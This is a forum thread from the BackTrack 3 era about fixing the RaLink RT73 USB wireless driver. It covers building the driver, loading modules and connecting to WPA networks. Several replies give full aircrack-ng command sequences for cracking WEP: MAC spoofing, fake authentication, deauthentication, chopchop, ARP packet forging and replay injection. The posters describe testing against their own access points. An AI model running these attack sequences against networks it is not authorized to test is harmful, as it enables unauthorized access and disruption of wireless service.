BT3 final has a few minor issues with our driver that are fairly easy to circumvent and I wanted to share my solutions here. This is a collection of notes and ideas I have put together from my time here and first and foremost I want to thank the community because everything I'm putting here I found from various posts in these very forums. ;)

I would also like to ask you to please remember this is a howto for the RaLink RT73 USB Enhanced Driver. Please keep the discussion in this post relevant and don't ask for support for mundane BT3 tasks.

Now lets begin. Its a good idea to grab a couple things before we get started. The first thing you need to do is get the BT3 kernel sources (http://www.offensive-security.com/kernel.lzm) (thank you shamanvirtuel for delivering me from my noobedness)
and after that you will need the previous version (http://homepages.tu-darmstadt.de/%7Ep_larbig/wlan/rt73-k2wrlz-2.0.1.tar.bz2) of the aspj driver. (SV yet again infinitely wise)

After you have what you need and you are in BT you can bring down your current interface and driver with
ifconfig rausb0 down

modprobe -r rt73Then you wanna navigate to your folder with the kernel.lzm and type
lzm2dir kernel.lzm /afterward you can go the the driver folder and
make

make installnow you can bring up the driver and interface with
modprobe rt73

ifconfig rausb0 upAt this point your wireless card is ready to be put to good use. Iwpriv commands and SpoonWep will now work gloriously! If you are looking to crack wep/wpa with our card use SpoonWep or look here (http://forums.remote-exploit.org/showthread.php?p=90339#post90339) for a tutorial on how do do it with the terminal, if you are looking to connect to a wep encrypted AP use wireless assistant, and if you are trying to connect to wpa/wpa2 use these commands.
ifconfig rausb0 up
iwconfig rausb0 mode managed
iwconfig rausb0 essid <Your SSID>
iwpriv rausb0 set AuthMode=WPAPSK (or WPA2PSK if you are using WPA2) *WPA2PSK is for this line only
iwpriv rausb0 set WPAPSK=<Your Key>
iwpriv rausb0 set EncrypType=TKIP (or AES)
dhcpcd rausb0
This has worked very well for me and I hope it works for you to. Good luck. :D

When Bt3 loads it recognizes that the rt73 driver is loaded and sees the rausb0 interface but will not pick up ap's in any program. The fix I have found is to simply

modprobe -r rt73
modprobe rt73

Or even better... Use SpoonDrv. ;)

Please, can you explain what is SpoonDrv? is better?

I too have the Edimax EW-7318USg and just like the OP said, it doesn't work out of the box. I also had to modprobe the adapter for it to work.

I doesn't bother me now, but out of curiosity can any of the dev's explain the reason why the card doesn't work for BT3 Final? It works on BT3beta out of the box.

My problem is that I can't get the Edimax EW-7318USg to inject with BT3. I had no problem with BT2 and have searched this forum but most of what I find suggests that it sould work out of the box or try:-

iwpriv rausb0 rfmontx 1
iwpriv rausb0 forceprism 1
iwconfig rausb0 mode monitor

Done this but when I try 'aireplay-ng -9 rausb0' against my AP it is a 100% failure, any suggestions would be appreciated.

My problem is that I can't get the Edimax EW-7318USg to inject with BT3. I had no problem with BT2 and have searched this forum but most of what I find suggests that it sould work out of the box or try:-

iwpriv rausb0 rfmontx 1
iwpriv rausb0 forceprism 1
iwconfig rausb0 mode monitor

Done this but when I try 'aireplay-ng -9 rausb0' against my AP it is a 100% failure, any suggestions would be appreciated.

Try this:


$ airmon-ng stop rausb0
$ ifconfig rausb0 down
$ macchanger --mac 00:11:22:33:44:55 rausb0
$ airmon-ng start rausb0
$ airodump-ng rausb0
find the bssid
copy the bssid
$ airodump-ng -c 1 -w output --bssid <bssid> rausb0
$ aireplay -1 0 -a paste -h 00:11:22:33:44:55 rausb0
$ aireplay-ng -0 5 -a <bssid> rausb0
$ aireplay-ng -4 -b <bssid> -h 00:11:22:33:44:55 rausb0
answer yes and wait
$ packetforge-ng --arp -a <bssid> -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255 -y filename.xor -w arprequest
$ aireplay-ng -2 -r arprequest rausb0
say yes
$ aircrack-ng output-01.cap

speed999, The aircrack wiki for our driver (found here (http://www.aircrack-ng.org/doku.php?id=rt73) ) Says to try

iwconfig rausb0 rate 1M


good luck.

Try this:


$ airmon-ng stop rausb0
$ ifconfig rausb0 down
$ macchanger --mac 00:11:22:33:44:55 rausb0
$ airmon-ng start rausb0
$ airodump-ng rausb0
find the bssid
copy the bssid
$ airodump-ng -c 1 -w output --bssid <bssid> rausb0
$ aireplay -1 0 -a paste -h 00:11:22:33:44:55 rausb0
$ aireplay-ng -0 5 -a <bssid> rausb0
$ aireplay-ng -4 -b <bssid> -h 00:11:22:33:44:55 rausb0
answer yes and wait
$ packetforge-ng --arp -a <bssid> -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255 -y filename.xor -w arprequest
$ aireplay-ng -2 -r arprequest rausb0
say yes
$ aircrack-ng output-01.cap

Tried this but 'aireplay-ng -1 0 -a <bssid> -h 00:11:22:33:44:55 rausb0' fails after 'Sending Authentication Request' with 'Attack was unsuccessful'. This is the same problem I have when using:-

airodump-ng --ivs --channel 11 --bssid <bssid> -w capturefile rausb0

aireplay-ng -1 0 -e <essid> -a <bssid> -h <edimax> rausb0
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b <bssid> -h <edimax> rausb0

aircrack-ng -b <bssid> capturefile*.ivs

I only get to attempting the fake authentication and it fails! No problem with the same attack using BT2.

Tried ‘iwconfig rausb0 rate 1M’

The fake authentication worked but 'aireplay-ng -4 -b <bssid> -h 00:11:22:33:44:55 rausb0' failed 'the access point does not properly discard frames with an invalid ICV.....'

When I used:-

airodump-ng --ivs --channel 11 --bssid <bssid> -w capturefile rausb0

aireplay-ng -1 0 -e <essid> -a <bssid> -h <edimax> rausb0
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b <bssid> -h <edimax> rausb0

Brilliant and thanks it works!

As the attack I have used works on BT2, I don’t think I would have made the link between the Aircrack wiki and BT3 without your help. My knowledge of Unix is almost zero so could I ask another question. The pps looks a bit slow compared with BT2 so if I try increasing the rate from 1M what do you recommend the increments should be?

Thanks again for everyone’s help

<snip>
When I used:-

airodump-ng --ivs --channel 11 --bssid <bssid> -w capturefile rausb0

aireplay-ng -1 0 -e <essid> -a <bssid> -h <edimax> rausb0
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b <bssid> -h <edimax> rausb0

Brilliant and thanks it works!

As the attack I have used works on BT2, I don’t think I would have made the link between the Aircrack wiki and BT3 without your help. My knowledge of Unix is almost zero so could I ask another question. The pps looks a bit slow compared with BT2 so if I try increasing the rate from 1M what do you recommend the increments should be?

Thanks again for everyone’s help

Well I don't know what the increment should be, but if you increase it by 1dBi each time until it doesn't work; you will find your answer.


iwconfig rausb0 txpower 10


Then increase it by 1dBi each time:

iwconfig rausb0 txpower 11


Lucky for you anyway! All day I have been trying to inject my AP with my Edimax and I can't! LOL!
It gets worse, Back|Track does recognize my card, but I tried a LOT of tricks and it was a hit and miss. It took me nearly 3 hours to connect to my AP as the card didn't see any AP's at all!:eek: Then when I set my card into monitor mode to test out the funny EzPWN toolset just for a laugh...it didn't see any APs!

I exited EzPWN and loaded airodump-ng, it seen the APs. Then I stopped airodump-ng in order to define my AP in airodump and start injecting...nothing, it didn't even see any AP's. I can not connect to the internet on BackTrack unless I load it, restart it, load it and restart it again. Its very frustrating because it was working perfectly for a while and now I have to hold off my BASE/Snort/With_Graphs tutorial as Im in Windows as its the only way I can connect to my AP.

Incase anyone is wondering, yes I do have a built in Atheros but I am not in my computer room today and the ath0 is crap from my shed. Any help from anyone on this mysterious rt73 problem would be appreciated.

Okay, I am still in Windows [only way to surf at the moment] and I found this on the Aircrack-ng site:

The instructions below reference an older version of the drivers then is available on ASPj's site. This is because the newer version contains some bugs. See the forum threads for details.


I am going to look into this as soon as I boot back into BT3f

I am having strange issues with my card as well. Fortunately I have an intel pro wireless one a laptop so I have been using that to play around on.

First, with my Edimax 7318 I can crack wep/wpa just fine in command line but I still have had absolutely zero success with SV's SpoonWep(works just fine on laptop with other card). SV had asked me to try installing the rt73-k2wrlz-2.0.1. driver but I have yet to try it.

Second, No matter what I try, I cannot connect to my AP with WPA2 encryption.
My previous working method for connecting with my card in BT is no longer working(see code below) and wireless assistant is fail.

ifconfig rausb0 up
iwconfig rausb0 mode managed
iwconfig rausb0 essid <Your SSID>
iwpriv rausb0 set AuthMode=WPAPSK (or WPA2PSK if you are using WPA2)
iwpriv rausb0 set WPAPSK=<Your Key>
iwpriv rausb0 set EncrypType=TKIP (or AES)
dhcpcd rausb0

My next step is to try the previous aspj driver,drop my encryption to wep, and see if I can connect/scan/exploit ok.

Please post your solutions Denv and I will post any I find as well. Thanks.

I am having strange issues with my card as well. Fortunately I have an intel pro wireless one a laptop so I have been using that to play around on.

First, with my Edimax 7318 I can crack wep/wpa just fine in command line but I still have had absolutely zero success with SV's SpoonWep(works just fine on laptop with other card). SV had asked me to try installing the rt73-k2wrlz-2.0.1. driver but I have yet to try it.

Second, No matter what I try, I cannot connect to my AP with WPA2 encryption.
My previous working method for connecting with my card in BT is no longer working(see code below) and wireless assistant is fail.

ifconfig rausb0 up
iwconfig rausb0 mode managed
iwconfig rausb0 essid <Your SSID>
iwpriv rausb0 set AuthMode=WPAPSK (or WPA2PSK if you are using WPA2)
iwpriv rausb0 set WPAPSK=<Your Key>
iwpriv rausb0 set EncrypType=TKIP (or AES)
dhcpcd rausb0

My next step is to try the previous aspj driver,drop my encryption to wep, and see if I can connect/scan/exploit ok.

Please post your solutions Denv and I will post any I find as well. Thanks.

I will do, no sweat man. Im on Windows at the moment using my Atheros card, it's nearly 5am and I have been awake for more or less 2 days trying to get BASE working. Not a problem, tomorrow I will troubleshoot my Edimax and post my results here. I also have zero success with Wireless Assistant and SpoonWep, of course CL was my first approach and it 'half' worked and hasn't worked since.

[QUOTE=The_Denv;88507]Well I don't know what the increment should be, but if you increase it by 1dBi each time until it doesn't work; you will find your answer.


iwconfig rausb0 txpower 10


Then increase it by 1dBi each time:

iwconfig rausb0 txpower 11


It was ‘rate’ that I was interested in but I gave ‘txpower’ a go and ‘iwconfig’ said ‘Operation not supported’ Tried increments of ‘1M’ with ‘rate’ using ‘aireplay-ng -9 rausb0’. For what it is worth, found 1, 2 and 5 worked well, 3 & 4 and all above 5 with the exception 9 failed to inject. 9 worked some of the time.

Strange!

[QUOTE=The_Denv;88507]Well I don't know what the increment should be, but if you increase it by 1dBi each time until it doesn't work; you will find your answer.


iwconfig rausb0 txpower 10


Then increase it by 1dBi each time:

iwconfig rausb0 txpower 11


It was ‘rate’ that I was interested in but I gave ‘txpower’ a go and ‘iwconfig’ said ‘Operation not supported’ Tried increments of ‘1M’ with ‘rate’ using ‘aireplay-ng -9 rausb0’. For what it is worth, found 1, 2 and 5 worked well, 3 & 4 and all above 5 with the exception 9 failed to inject. 9 worked some of the time.

Strange!

Ahh , sorry about the txpower command. Apparently its only supported on Ubuntu; I got the commands mixed up with a different Linux distro. So you are interested in the 'rate'?


$ iwconfig rausb0 rate 54M


Is this what you mean? I am confused to what you want :confused:

[QUOTE=speed999;88678]




$ iwconfig rausb0 rate 54M




Yes this was the one, Only tried 1M to 10M and as you can see from previous post the results suggest that only some rates in this range will work. Not tried anything above 10M, I assume that as it is a 54Mb card it should be possible to use anything uo to 54M.

Okay... Today I have spent alot of time with this and I can do everything except for connecting to wpa and Spoonwep. Further investigation has shown that everything works just fine once connected to an open/wep AP, however wpa still refuses to connect. I have tried the iwpriv commands I posted before, as well as some slightly different ones SV had posted in a different thread, and even tried to configure wpa_supplicant.conf (a flailing attempt, I know it doesnt work for our driver but it didnt take long and was worth a shot).

After this I attempted to try different drivers. I downloaded the official one from Edimax and rt73-k2wrlz-2.0.1.tar.bz2, an earlier version of the current driver. This is where my latest problem begins.

I cant seem to do a make install, every time I try to make install the driver (as instructed by the read me) I get the error listed below. I get a similar error when trying to make install the rt73-k2wrlz-2.0.1 driver as well.
bt ~ # cd /usr/src/RT73/2008_0117_RT73_Linux_STA_Drv1.1.0.0/Module
bt Module # ls
Configure connect.c netif_block.h rtmp_type.h
Makefile ifcfg-rausb0 oid.h rtmp_wep.c
Makefile.4 iwpriv_usage.txt rt73.bin rtmp_wext.c
Makefile.6 link_list.h rt73.h rtmp_wext.h
Makefile.CMPC load rt73sta.dat rtusb_bulk.c
Module.symvers md5.c rt_config.h rtusb_data.c
README md5.h rt_user.c rtusb_io.c
ReleaseNote mlme.c rtmp.h sanity.c
STA_iwpriv_ATE_usage.txt mlme.h rtmp_def.h sync.c
assoc.c mlme_ex.c rtmp_info.c unload
auth.c mlme_ex.h rtmp_init.c wpa.c
auth_rsp.c mlme_ex_def.h rtmp_main.c wpa.h
config.mk netif_block.c rtmp_tkip.c
bt Module # cp Makefile.6 ./Makefile
bt Module # make install
make -C /lib/modules/2.6.21.5/build \
INSTALL_MOD_DIR=extra SUBDIRS=/usr/src/RT73/2008_0117_RT73_Linux_STA_Drv 1.1.0.0/Module \
modules_install
make: *** /lib/modules/2.6.21.5/build: No such file or directory. Stop.
make: *** [install] Error 2


So now I am stumped, I have exhausted everything in my limited library of knowledge and nothing seems to work. Not even SpoonDrv can seem to download and install a driver. I am low on time today but later tonight I plan to google my make install problem and make sure its not a common issue.

If anyone has any suggestions I will be glad to hear them and if I come across any solutions I will be sure to post back as well.

I just edited the original post with all the solutions I have found. The card is working great for me now and I hope everyone finds equal success!

Hello
Just wanted to share that i have a Linksys WUSB54G with the rt73 chip and i have used your solution and it works now.
At least i can catch networks, nothing worked before.
Thank you

Cortex, Thank you for replying. Since I only have an Edimax EW-7318, I did not realize when starting this thread that the rt73 driver was shared by multiple cards. To make things easier I had the name of the thread changed to reflect that this method works for anyone with the same rt73 driver.

Hello.
I followed the tuto, but when I did

"iwpriv rausb0 set WPA2PSK=(my key)"

it returned

"Interface doesn't accept private ioctl...
set (8BE2) : Invalid argument"

What's the f___ ?

My example says...
iwpriv rausb0 set WPAPSK=<Your Key>


and it seems you used
"iwpriv rausb0 set WPA2PSK=(my key)"

You only need to do WPA2PSK for
iwpriv rausb0 set AuthMode=WPAPSK (or WPA2PSK if you are using WPA2)

Try it without the 2 ;)

Holy shit !

This works great !!!

Dude, you're God, thank you very much !

(the last time I tried it, I made synthax fault, it's "EncrypType" and not "EncryptType" lol :rolleyes:)

Yeah that's works great! Even without second and third step it works fine on my Advent 9117 using Ralink RT73 USB
Cheers,

I still cant get it working.
After tipping "dhcpcd rausb0", it does something and then stops.
Nothing happens.

Don't get me wrong I'm working for hours on this small problem, but I can't get it fixed. I'm getting frustrated...

Why the need for a poll? :confused:

Polls suck!:mad:

Polls are good only when the subject experts is polling.votes of n00bs are waste of time and mislead to wrong directions.

I added the poll because this is my first tutorial and I wanted to gauge how well it is written. Even if people are super noob and vote that they didnt get it working, it lets me know that maybe I can re word something and make it better. It's far from the mentality of "what is ur fav bt hax" polls

Did you install the kernel sources and latest/previous rt73 driver? If so make sure your doing everything as stated in the tutorial. Also if you are using wpa2 you will need to change this line

iwpriv rausb0 set AuthMode=WPAPSK
to
iwpriv rausb0 set AuthMode=WPA2PSK

Did you install the kernel sources and latest/previous rt73 driver? If so make sure your doing everything as stated in the tutorial. Also if you are using wpa2 you will need to change this line

iwpriv rausb0 set AuthMode=WPAPSK
to
iwpriv rausb0 set AuthMode=WPA2PSK
Since the launching of aspj 3.0.1 drivers I am using it.see my tutorial for various enhancement in latest rt73 drivers.

http://forums.remote-exploit.org/showthread.php?t=15785

Yeah thanks finally it works.
I guess my problems startet because I was trying to connect to a network with hidden essid. I still don't know how I can connect to it, though.

Thanks for your Tutorial it really helps.